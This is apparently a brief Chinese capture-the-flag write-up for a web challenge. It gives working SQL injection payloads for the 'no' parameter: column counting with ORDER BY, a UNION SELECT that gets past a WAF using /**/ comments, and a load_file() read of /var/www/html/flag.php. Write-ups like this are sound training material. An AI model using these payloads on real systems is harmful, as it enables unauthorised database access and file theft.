1.题干


dirb一下,发现robots.txt和flag.php和/css和/js
打开flag.php啥都没有:

打开后注册,找到疑似SQL注入漏洞

PayLoad:?no=1%20order%20by%201#
order by 查询列数据。

尝试联合查询,被WAF捕捉。
用 /**/过滤:PayLoad:?no=1%20union/**/select#

进入无聊的联合查询:
联合查询:

发现2存在注入点
查找数据库和数据表
Payload:?no=2 union++select 1,database(),3,4# & ?no=2 union++select 1,user(),3,4#

发现是root权限(happy)
且注意到路径(/var/www/html/view.php)
查出flag.php
Payload:?no=2%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4#

找到flag.
提交:

本文介绍了一个利用SQL注入漏洞获取敏感信息的实际案例。通过dirb工具发现目标网站存在多个潜在入口,利用SQL注入技巧找到了数据库名及管理员权限信息,并最终通过读取文件功能获取了flag.php中的flag。
1万+

被折叠的 条评论
为什么被折叠?



